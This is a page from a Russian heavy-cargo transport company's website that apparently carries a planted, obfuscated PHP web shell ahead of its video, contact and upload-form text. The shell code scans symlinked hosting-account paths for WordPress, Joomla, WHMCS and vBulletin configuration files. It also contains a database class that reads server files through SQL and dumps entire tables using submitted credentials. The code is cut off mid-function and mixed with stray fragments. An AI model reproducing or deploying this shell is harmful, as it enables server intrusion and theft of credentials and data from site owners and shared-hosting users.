$IIIIIIIIlI11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/includes/config.php'; $IIIIIIIIllII=get_headers($IIIIIIIIlI11); $IIIIIIIIllIl=$IIIIIIIIllII[0]; $IIIIIIIIllI1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/vb/includes/config.php'; $IIIIIIIIlllI=get_headers($IIIIIIIIllI1); $IIIIIIIIllll=$IIIIIIIIlllI[0]; $IIIIIIIIlll1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/forum/includes/config.php'; $IIIIIIIIll1I=get_headers($IIIIIIIIlll1); $IIIIIIIIll1l=$IIIIIIIIll1I[0]; $IIIIIIIIll11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'public_html/clients/configuration.php'; $IIIIIIIIl1II=get_headers($IIIIIIIIll11); $IIIIIIIIl1Il=$IIIIIIIIl1II[0]; $IIIIIIIIl1I1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/support/configuration.php'; $IIIIIIIIl1II=get_headers($IIIIIIIIl1I1); $IIIIIIIIl1lI=$IIIIIIIIl1II[0]; $IIIIIIIIl1ll=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php'; $IIIIIIIIl1l1=get_headers($IIIIIIIIl1ll); $IIIIIIIIl11I=$IIIIIIIIl1l1[0]; $IIIIIIIIl11l=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/submitticket.php'; $IIIIIIIIl111=get_headers($IIIIIIIIl11l); $IIIIIIII1III=$IIIIIIIIl111[0]; $IIIIIIII1IIl=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php'; $IIIIIIII1II1=get_headers($IIIIIIII1IIl); $IIIIIIII1IlI=$IIIIIIII1II1[0]; $IIIIIIII1Ill = strpos($IIIIIIIII11l,'200'); $IIIIIIII1I1I=' '; if (strpos($IIIIIIIII11l,'200') == true ) { $IIIIIIII1I1I="Wordpress"; } elseif (strpos($IIIIIIIIlIIl,'200') == true) { $IIIIIIII1I1I="Wordpress"; } elseif (strpos($IIIIIIIIlIll,'200') == true and strpos($IIIIIIII1III,'200') == true ) { $IIIIIIII1I1I=" WHMCS"; } elseif (strpos($IIIIIIIIl1lI,'200') == true) { $IIIIIIII1I1I =" WHMCS"; } elseif (strpos($IIIIIIIIl11I,'200') == true) { $IIIIIIII1I1I =" WHMCS"; } elseif (strpos($IIIIIIIIlIll,'200') == true) { $IIIIIIII1I1I=" Joomla"; } elseif (strpos($IIIIIIIIlI1l,'200') == true) { $IIIIIIII1I1I=" Joomla"; } elseif (strpos($IIIIIIIIllIl,'200') == true) { $IIIIIIII1I1I=" vBulletin"; } elseif (strpos($IIIIIIIIllll,'200') == true) { $IIIIIIII1I1I=" vBulletin"; } elseif (strpos($IIIIIIIIll1l,'200') == true) { $IIIIIIII1I1I=" vBulletin"; } else { continue; } $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ; echo '';flush(); } } } } echo "
Domains Script
'.$IIIIIIIIIl11[1][0].' '.$IIIIIIII1I1I.'
"; } echo "
"; madfooter(); } function madsql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->query("SHOW databases"); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error(); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); break; case 'pgsql': $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;"); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table wso2'); return array('file'=>implode("\n",$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); $sql = $create[1].";\n"; if($fp) fwrite($fp, $sql); else echo($sql); $this->query('SELECT * FROM `'.$table.'`'); $head = true; while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { if($v == null) $item[$k] = "NULL"; elseif(is_numeric($v)) $item[$k] = $v; else $item[$k] = "'".@mysql_real_escape_string($v)."'"; $columns[] = "`".$k."`"; } if($head) { $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')'; $head = false; } else $sql = "\n\t,(".implode(", ", $item).')'; if($fp) fwrite($fp, $sql); else echo($sql); } if(!$head) if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "'".addslashes($v)."'"; $columns[] = $k; } $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST['type']); if(@$_POST['p2']=='download') { $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } if(empty($_POST['file'])) { ob_start("ob_gzhandler", 409

Видео

Дом у дороги
Репортаж на ТВ-100
Все видео

Контакты

Select image to upload:

© 2008 «Кин-Марк» - перевозка негабаритных тяжеловесных грузов